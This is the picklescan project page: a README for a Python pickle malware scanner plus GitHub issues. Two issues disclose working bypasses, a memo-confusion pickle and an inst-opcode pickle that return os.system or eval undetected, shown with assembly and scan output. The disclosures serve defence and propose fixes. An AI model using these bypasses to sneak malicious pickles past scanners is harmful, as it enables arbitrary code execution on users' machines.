
picklescan's Introduction

Python Pickle Malware Scanner


Security scanner detecting Python Pickle files performing suspicious actions.

For more generic model scanning, Protect AI's modelscan is now available to scan not only Pickle files but also PyTorch, TensorFlow, and Keras.

Getting started

Scan a malicious model on Hugging Face:

pip install picklescan
picklescan --huggingface ykilcher/totally-harmless-model

The scanner reports that the Pickle is calling eval() to execute arbitrary code:

https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin:archive/data.pkl: global import '__builtin__ eval' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1
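The standard library's `pickletools` can disassemble a pickle without ever loading it, which shows where a report like `'__builtin__ eval'` comes from. The sketch below is illustrative only and is not picklescan's implementation. The `Payload` class and the `global_references` helper are hypothetical. With the default `fix_imports=True`, protocols below 3 write the `builtins` module under its Python 2 name `__builtin__`, which matches the name in the report above.

```python
import pickle
import pickletools
from typing import List


class Payload:
    """Hypothetical object whose pickle would call eval("1 + 1") when loaded."""

    def __reduce__(self):
        # Tells pickle to rebuild this object by calling eval("1 + 1").
        return (eval, ("1 + 1",))


def global_references(data: bytes) -> List[str]:
    """List the "module name" arguments of GLOBAL opcodes without unpickling."""
    return [arg for opcode, arg, _pos in pickletools.genops(data) if opcode.name == "GLOBAL"]


# Serializing is harmless; only pickle.loads() would actually run eval.
data = pickle.dumps(Payload(), protocol=2)
print(global_references(data))  # ['__builtin__ eval']
```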

The scanner can also load Pickles from local files, directories, URLs, and zip archives (à la PyTorch):

picklescan --path downloads/pytorch_model.bin
picklescan --path downloads
picklescan --url https://huggingface.co/sshleifer/tiny-distilbert-base-cased-distilled-squad/resolve/main/pytorch_model.bin

To scan NumPy's .npy files, pip install the numpy package first.

The scanner exit status codes are (à la ClamAV):

  • 0: scan did not find malware
  • 1: scan found malware
  • 2: scan failed
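These exit statuses let a CI job gate on the scan result. The following is a minimal sketch that assumes the `picklescan` executable is on `PATH` and uses only the `--path` flag shown above. The `interpret_exit_status` and `scan_or_fail` helpers are hypothetical names.

```python
import subprocess
import sys

# Meanings taken from the exit status list above.
EXIT_MEANINGS = {0: "no malware found", 1: "malware found", 2: "scan failed"}


def interpret_exit_status(code: int) -> str:
    """Map a picklescan exit status to a human-readable meaning."""
    return EXIT_MEANINGS.get(code, f"unexpected exit status {code}")


def scan_or_fail(path: str) -> None:
    """Run picklescan on a file or directory and stop the job unless it is clean."""
    result = subprocess.run(["picklescan", "--path", path], check=False)
    if result.returncode != 0:
        # sys.exit with a string prints it to stderr and exits with status 1.
        sys.exit(f"picklescan {path}: {interpret_exit_status(result.returncode)}")
```

In a pipeline step, `scan_or_fail("downloads")` would stop the job on both "malware found" and "scan failed", so a scanner crash is never mistaken for a clean result.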

Develop

Create and activate the conda environment (miniconda is sufficient):

conda env create -f conda.yaml
conda activate picklescan

Install the package in editable mode to develop and test:

python3 -m pip install -e .

Edit with VS Code:

code .

Run unit tests:

pytest tests

Run manual tests:

  • Local PyTorch (zip) file
mkdir downloads
wget -O downloads/pytorch_model.bin https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin
picklescan -l DEBUG -p downloads/pytorch_model.bin
  • Remote PyTorch (zip) URL
picklescan -l DEBUG -u https://huggingface.co/prajjwal1/bert-tiny/resolve/main/pytorch_model.bin

Lint the code:

black src tests
flake8 src tests --count --show-source

Publish the package to PyPI: bump the package version in setup.cfg and create a GitHub release. This triggers the publish workflow.

Alternative manual steps to publish the package:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade build
python3 -m build
python3 -m twine upload dist/*

Test the package: bump the version of picklescan in conda.test.yaml and run:

conda env remove -n picklescan-test
conda env create -f conda.test.yaml
conda activate picklescan-test
picklescan --huggingface ykilcher/totally-harmless-model

Tested on Linux 5.10.102.1-microsoft-standard-WSL2 x86_64 (WSL2).


picklescan's Issues

Possible vulnerability in picklescan==0.0.12

Hi,

Check out the following CTF challenge:
https://imaginaryctf.org/Challenges / Misc / Safe Pickle

The Dockerfile states that it uses the latest version of picklescan.

Challenge code:

#!/usr/bin/env python3
from picklescan.scanner import scan_pickle_bytes, SafetyLevel
import io, pickle, base64

inp = input("Base64 encoded pickle: ")
pkl = base64.b64decode(inp)
result = scan_pickle_bytes(io.BytesIO(pkl), 1337)
if (
    result.scan_err
    or result.issues_count > 0
    or not all([g.safety == SafetyLevel.Innocuous for g in result.globals])
):
    print("Dangerous pickle!")
    exit()

pickle.loads(pkl)

ValueError: at position 2, opcode b'\x03' unknown

I installed this with pip, and when I run it I get this error:
picklescan --path G:/AI_Generation/stable-diffusion-webui-master/models/Stable-diffusion/
Unhandled exception
Traceback (most recent call last):
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\cli.py", line 70, in main
    scan_result = scan_directory_path(path)
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 410, in scan_directory_path
    scan_result.merge(scan_bytes(file, file_path, file_ext))
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 350, in scan_bytes
    return scan_pytorch(data, file_id)
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 338, in scan_pytorch
    magic = get_magic_number(data)
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\torch.py", line 77, in get_magic_number
    for opcode, args, _pos in genops(data):
  File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\pickletools.py", line 2285, in _genops
    raise ValueError("at position %s, opcode %r unknown" % (
ValueError: at position 2, opcode b'\x03' unknown

Now if I run:

picklescan --huggingface ykilcher/totally-harmless-model
https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin:archive/data.pkl: dangerous import '__builtin__ eval' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1

As you can see, that scan works fine.
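The last frame of the traceback shows that the `ValueError` comes from the standard library's `pickletools.genops`. That function raises as soon as it meets a byte that is not a pickle opcode. The minimal sketch below reproduces the same message with three hand-picked bytes: a protocol-2 header followed by `0x03`, which is not an opcode. These bytes are not claimed to be what the reporter's files contain. The sketch also defines a hypothetical `list_opcodes` helper that reports such a failure for one file instead of letting it abort a whole directory scan. This is not picklescan's code.

```python
import pickletools
from typing import List, Optional, Tuple


def list_opcodes(data: bytes) -> Tuple[List[str], Optional[str]]:
    """Return the opcode names parsed so far and an error message, if parsing failed."""
    names: List[str] = []
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            names.append(opcode.name)
    except ValueError as exc:
        # genops raises ValueError for unknown opcodes and truncated data.
        return names, str(exc)
    return names, None


# PROTO 2 header, then 0x03, which is not a pickle opcode.
names, error = list_opcodes(b"\x80\x02\x03")
print(names, error)  # ['PROTO'] at position 2, opcode b'\x03' unknown
```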

Add logs to cli for download

When running picklescan -u <url>, it would be nice to have a log of the download, or even better a progress bar.
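The sketch below shows one way such logging could work, using the standard library's `urllib.request.urlretrieve` and its `reporthook` callback. It is not picklescan's download code. `make_progress_hook`, `download` and the logger name are hypothetical.

```python
import logging
import urllib.request
from typing import Callable

logger = logging.getLogger("picklescan-download")  # hypothetical logger name


def make_progress_hook(url: str, log: Callable[[str], None] = logger.info):
    """Build a urlretrieve reporthook that logs roughly every 10% of the download."""
    last_logged = -10

    def hook(block_num: int, block_size: int, total_size: int) -> None:
        nonlocal last_logged
        downloaded = block_num * block_size
        if total_size > 0:
            percent = min(100, downloaded * 100 // total_size)
            if percent >= last_logged + 10:
                last_logged = percent
                log(f"{url}: {percent}% of {total_size} bytes")
        elif block_num % 100 == 0:
            # No Content-Length from the server: report bytes received instead.
            log(f"{url}: {downloaded} bytes received")

    return hook


def download(url: str, filename: str) -> str:
    """Download url to filename, logging progress along the way."""
    path, _headers = urllib.request.urlretrieve(url, filename, reporthook=make_progress_hook(url))
    return path
```

Passing `log` as a parameter keeps the hook testable and would also let a progress-bar callback replace plain log lines.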

Dangerous global detection bypass with memo dict confusion

Info

The picklescan tool attempts to keep track of the memo dict by parsing the
memoize opcodes whenever seen. The binput and put instructions also
insert objects into the memo but are left unhandled. While a legitimate Python 3
pickle should never mix *put and memoize instructions, doing so is accepted
by pickle.load.

Malware can potentially set up the memo using a mix of these opcodes so that
picklescan thinks memo[0] contains a safe module name like torch._utils
when it actually contains a dangerous one. Combined with the binget
and stack_global instructions, this can make any arbitrary Python import look
safe to picklescan.

Example

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

The following memo.asm file is commented to explain the bypass. Comments
start with ;.

;; Dangerous strings added to memo
binstring "os"      ;; module name for os.system
binput 0            ;; memo[0] = stack[-1] = "os"
binstring "system"  ;; function name for os.system
binput 1            ;; memo[1] = stack[-1] = "system"

;; Safe strings added to memo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize

;; State of memo
;; real memo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}

binget 0        ;; "os" but picklescan thinks it's "torch._utils"
binget 1        ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global    ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop

The pickle can be assembled with rasm2.

$ rasm2 -a pickle -Bf memo.asm > memo.pickle

Decompiling the pickle with r2 may help with understanding.

# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)

The pickle will return os.system when loaded, proving access to a
dangerous function without a detection by picklescan.

$ python3 -m pickle memo.pickle
<built-in function system>

$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Fix

A legitimate pickle that uses memoize should not use binput or put. So
the simplest fix is to mark any pickle that contains a memoize instruction
and either a binput or a put instruction as dangerous.
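The suggested rule can be sketched with the standard library's `pickletools.genops`, which lists opcodes without executing anything. This is a minimal sketch, not picklescan's implementation, and `mixes_memo_opcodes` is a hypothetical name. Treating `LONG_BINPUT` like `BINPUT` and `PUT` goes beyond the text above and is an assumption; it is the third opcode that stores to an explicit memo index. `MEMO_CONFUSION` reassembles the memo.asm sequence above by hand, using `SHORT_BINUNICODE` instead of `BINSTRING` for the strings.

```python
import pickle
import pickletools

# Opcodes that store the stack top at an explicit memo index.
PUT_OPCODES = {"PUT", "BINPUT", "LONG_BINPUT"}


def mixes_memo_opcodes(data: bytes) -> bool:
    """True if the pickle uses MEMOIZE together with any explicit *PUT opcode."""
    names = {opcode.name for opcode, _arg, _pos in pickletools.genops(data)}
    return "MEMOIZE" in names and not names.isdisjoint(PUT_OPCODES)


# The memo.asm sequence, assembled by hand (scanned only, never loaded).
MEMO_CONFUSION = (
    b"\x8c\x02os" b"q\x00"                 # "os"; BINPUT 0
    b"\x8c\x06system" b"q\x01"             # "system"; BINPUT 1
    b"\x8c\x0ctorch._utils" b"\x94"        # "torch._utils"; MEMOIZE -> memo[2]
    b"\x8c\x12_rebuild_tensor_v2" b"\x94"  # "_rebuild_tensor_v2"; MEMOIZE -> memo[3]
    b"h\x00" b"h\x01" b"\x93"              # BINGET 0; BINGET 1; STACK_GLOBAL (os.system)
    b"."                                   # STOP
)

print(mixes_memo_opcodes(MEMO_CONFUSION))                      # True
print(mixes_memo_opcodes(pickle.dumps(["a", "b"], protocol=2)))  # False: BINPUT only
print(mixes_memo_opcodes(pickle.dumps(["a", "b"], protocol=4)))  # False: MEMOIZE only
```

This only implements the coarse "mixing is dangerous" rule from the issue. It does not track the memo itself, so it does not address the broader point that memo parsing without a full AST is error-prone.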

Attempting to parse the memo without a full AST is error-prone.
r2pickledec is the only tool I am aware of that will produce a
full AST for all python pickle instructions. Running pdPj will produce the
following JSON for the above pickle.

$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
  "stack": [
    {
      "offset": 0,
      "type": "PY_STR",
      "value": "os"
    },
    {
      "offset": 9,
      "type": "PY_STR",
      "value": "system"
    },
    {
      "offset": 22,
      "type": "PY_STR",
      "value": "torch._utils"
    },
    {
      "offset": 40,
      "type": "PY_STR",
      "value": "_rebuild_tensor_v2"
    },
    {
      "offset": 68,
      "type": "PY_GLOB",
      "value": {
        "module": {
          "offset": 0,
          "type": "PY_STR",
          "prev_seen": ".stack[0]"
        },
        "name": {
          "offset": 9,
          "type": "PY_STR",
          "prev_seen": ".stack[1]"
        }
      }
    }
  ],
  "popstack": [
  ]
}

Using r2pickledec in picklescan is possible through r2pipe but would
require adding dependencies that are not trivially installed with just pip.

I am the author of the pickle architecture in r2 and the r2pickledec
plugin, so I can offer some help if desired.

A warning on using proto for a fix

Since the offending opcodes are protocol 2 instructions, it might be tempting
to only accept them when a pickle starts with proto 2. This won't work. A
pickle can redeclare its protocol version at will without any unpickling
error. Additionally, a pickle that has declared itself as proto 2 still has
access to protocol 4 instructions.
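Both claims can be checked with the standard library alone. The minimal sketch below uses hand-assembled bytes and a hypothetical `protocol_report` helper. `pickletools` exposes the protocol that introduced each opcode through `OpcodeInfo.proto`. `pickle.loads` accepts both a protocol-2 header followed by protocol-4 opcodes and a mid-stream `PROTO` redeclaration. Both payloads only build the string `"hi"`, so loading them here is harmless.

```python
import pickle
import pickletools
from typing import List, Tuple

# Declares protocol 2, then uses SHORT_BINUNICODE and MEMOIZE (protocol 4 opcodes).
DECLARED_2_USES_4 = b"\x80\x02" b"\x8c\x02hi" b"\x94" b"."
# Declares protocol 2, then redeclares protocol 4.
REDECLARED = b"\x80\x02" b"\x80\x04" b"\x8c\x02hi" b"."


def protocol_report(data: bytes) -> Tuple[List[int], int]:
    """Return the declared PROTO values and the highest protocol any opcode needs."""
    declared: List[int] = []
    highest = 0
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "PROTO":
            declared.append(arg)
        highest = max(highest, opcode.proto)
    return declared, highest


for payload in (DECLARED_2_USES_4, REDECLARED):
    print(protocol_report(payload), pickle.loads(payload))
# ([2], 4) hi
# ([2, 4], 4) hi
```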

EICAR Test

Add the ability to put the EICAR test string in a pickle file, so that you could see which existing tools might already be scanning pickle files. From there you could potentially build detection and alerting into existing EDRs, etc.

Pickle is file extension agnostic

I saw another list somewhere of the file extensions that Hugging Face will scan, but a pickle file can have an arbitrary extension. I'm not even sure you need a file extension at all:

_pytorch_file_extensions = {".bin", ".pt", ".pth", ".ckpt"}
_pickle_file_extensions = {".pkl", ".pickle", ".joblib", ".dat"}
_zip_file_extensions = {".zip", ".npz"}

Maybe you could scan for magic bytes for additional coverage? (According to this bug report, pickle files can also be mangled quite a bit.)
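Here is a minimal sketch of content-based detection, assuming the whole file fits in memory. It first checks the ZIP local-file-header magic `PK\x03\x04`, which PyTorch zip archives and `.npz` files start with. It then checks the NumPy `.npy` magic `\x93NUMPY`. Failing both, it tries to parse the bytes as a pickle with `pickletools.genops`. Protocol 0 and 1 pickles have no header byte at all, which is why the fallback parses instead of matching a magic number. `sniff_format` is a hypothetical name. A successful parse only shows the bytes are structurally a pickle, not that they are safe.

```python
import pickle
import pickletools
from typing import Optional

ZIP_MAGIC = b"PK\x03\x04"  # ZIP local file header (PyTorch zip archives, .npz)
NPY_MAGIC = b"\x93NUMPY"   # NumPy .npy header


def sniff_format(data: bytes) -> Optional[str]:
    """Guess 'zip', 'npy' or 'pickle' from content alone; None if unrecognized."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(NPY_MAGIC):
        return "npy"
    try:
        # genops walks opcodes up to STOP without executing them.
        for _opcode, _arg, _pos in pickletools.genops(data):
            pass
    except Exception:  # any parse error: not a pickle we can read
        return None
    return "pickle"


print(sniff_format(pickle.dumps([1, 2], protocol=0)))  # pickle
print(sniff_format(b"not a pickle"))                   # None
```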

Dangerous global detection bypass with `inst` instruction

The bypass

The inst instruction is very similar to global. The only difference is that
inst automatically calls the returned global object as a function. Since the
inst instruction is not handled by picklescan, it can be used by malware to
obtain dangerous functions without detection.

Example:

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

The pickle stored in the test.pickle file returns the dangerous function eval. Picklescan
considers it safe because no global or stack_global instruction is ever used.

$ rasm2 -a pickle -dBf test.pickle ## disassemble the pickle
mark
short_binstring "eval"
inst "builtins eval"
stop

$ r2 -a pickle -qqc 'pdP' test.pickle   # decompile the pickle to show how it works
## VM stack start, len 1
## VM[0] TOP
g_eval_x7 = _find_class("builtins", "eval")
return g_eval_x7("eval")

$ python3 -m pickle test.pickle
<built-in function eval>

$ picklescan -p test.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Suggested fix

Parse the inst instruction the same way the global instruction is parsed.
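Here is a minimal sketch of that suggestion using `pickletools.genops`. The standard library decodes the arguments of `GLOBAL` and `INST` the same way, as one `"module name"` string, so a single branch covers both. `named_globals` is a hypothetical helper, not picklescan's code. It deliberately ignores `STACK_GLOBAL`, whose operands come from the stack rather than from the opcode argument. `INST_EVAL` reassembles the test.pickle disassembly above.

```python
import pickle
import pickletools
from typing import List, Tuple


def named_globals(data: bytes) -> List[Tuple[str, str]]:
    """Collect (module, name) pairs imported by GLOBAL and INST opcodes."""
    found: List[Tuple[str, str]] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools decodes both arguments as "module name".
            module, name = arg.split(" ", 1)
            found.append((module, name))
    return found


# test.pickle: MARK, SHORT_BINSTRING "eval", INST builtins eval, STOP (scanned only, not loaded).
INST_EVAL = b"(" b"U\x04eval" b"ibuiltins\neval\n" b"."

print(named_globals(INST_EVAL))                      # [('builtins', 'eval')]
print(named_globals(pickle.dumps(len, protocol=3)))  # [('builtins', 'len')]
```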
